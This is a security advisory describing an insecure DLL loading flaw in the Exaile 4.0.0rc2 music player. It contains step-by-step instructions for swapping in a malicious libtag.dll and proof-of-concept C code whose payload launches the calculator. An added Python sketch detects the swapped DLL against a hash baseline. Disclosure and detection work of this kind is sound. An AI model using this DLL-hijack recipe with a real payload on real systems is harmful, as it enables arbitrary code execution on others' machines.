Exaile 4.0.0rc2 – Insecure DLL/Remote Code Execution

A local insecure DLL loading vulnerability has been discovered in the official Exaile v4.0.0rc2 software. Exaile does not verify the certificate of the file "libtag.dll" before loading it, which allows the execution of arbitrary code.

Vulnerable Software:
[+] Exaile

Vulnerable version(s):
[+] 4.0.0rc2

Affected Libraries:
[+] libtag.dll

Product & Service Introduction:
===============================

Exaile is a music player with a simple interface and powerful music management features.
Features include automatic album art retrieval, lyrics retrieval, Internet radio broadcasting, tabbed playlists, smart playlists with extensive filtering / search functions, and more.

(Copy of the Vendor Homepage: https://www.exaile.org/)

Date of Discovery:
==================

2018-09-24

Exploitation Technique:
=======================

Local & Remote

Platform Tested:
================

Windows 7 & 10

Solution – Fix & Patch:
=======================

Verify the certificate of libtag.dll before loading it. If the certificate is missing or invalid, the DLL is simply not loaded and Exaile will not be able to execute. Verifying the DLL certificate makes this kind of attack more difficult.

Levels Risk :

Proof of Concept (PoC):
=======================

To demonstrate the issue or to reproduce the arbitrary code execution, follow the steps below.

Manual steps to reproduce the local vulnerability ...
1. Compile the DLL
2. Rename the dynamic link library to libtag.dll
3. Go to the "C:\Program Files\Exaile" folder and look for the DLL named "libtag.dll"
4. Rename the original DLL "libtag.dll" to "libtag1.dll"
5. Place your malicious DLL in the "C:\Program Files\Exaile" directory and rename it to "libtag.dll"
6. Launch exaile.exe
7. Now the calculator executes!


-- PoC Exploit --
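#include <windows.h>
#include <stdlib.h>
#define DLLIMPORT __declspec (dllexport)

/* Forward declaration so the exported function can call the payload */
int evil(void);

/* Exported function; it only calls the payload */
DLLIMPORT void HrCreateConverter() { evil(); }

/* Demonstration payload: starts the calculator, then exits the process */
int evil(void)
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}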
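
The following detection sketch is an added example, not part of the original advisory or of Exaile's code. It uses a SHA-256 baseline instead of the certificate check recommended above and flags the state the reproduction steps leave behind: a changed libtag.dll next to the renamed original. The function names, the baseline format (lowercase file name mapped to digest) and the sample files are assumptions constructed for illustration.

```python
import hashlib
import os
import tempfile

def sha256_of(path):
    """Return the SHA-256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def audit_dlls(install_dir, baseline):
    """Compare DLLs in install_dir with a baseline {lowercase name: sha256}.
    Findings: MODIFIED (baselined name, new content), RENAMED (new name,
    baselined content), UNKNOWN (not in baseline), MISSING (absent).
    """
    by_hash = {digest: name for name, digest in baseline.items()}
    findings, seen = [], set()
    for name in os.listdir(install_dir):
        key = name.lower()  # Windows file names are case-insensitive
        if not key.endswith(".dll"):
            continue
        seen.add(key)
        digest = sha256_of(os.path.join(install_dir, name))
        if key in baseline:
            if digest != baseline[key]:
                findings.append(("MODIFIED", key))
        elif digest in by_hash:
            findings.append(("RENAMED", key))
        else:
            findings.append(("UNKNOWN", key))
    findings += [("MISSING", n) for n in baseline if n not in seen]
    return sorted(findings)

def demo():
    """Constructed sample: stand-in files, not real Exaile binaries."""
    with tempfile.TemporaryDirectory() as d:
        original = b"constructed stand-in for the vendor libtag.dll"
        baseline = {"libtag.dll": hashlib.sha256(original).hexdigest()}
        with open(os.path.join(d, "libtag1.dll"), "wb") as f:
            f.write(original)                    # original, renamed
        with open(os.path.join(d, "libtag.dll"), "wb") as f:
            f.write(b"constructed replacement")  # swapped-in file
        return audit_dlls(d, baseline)

if __name__ == "__main__":
    for finding in demo():
        print(*finding)
```

The baseline has to be recorded from a trusted installation and stored where an unprivileged user cannot modify it; otherwise it can be replaced together with the DLL.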

References:
===========

[#] cxsecurity.com
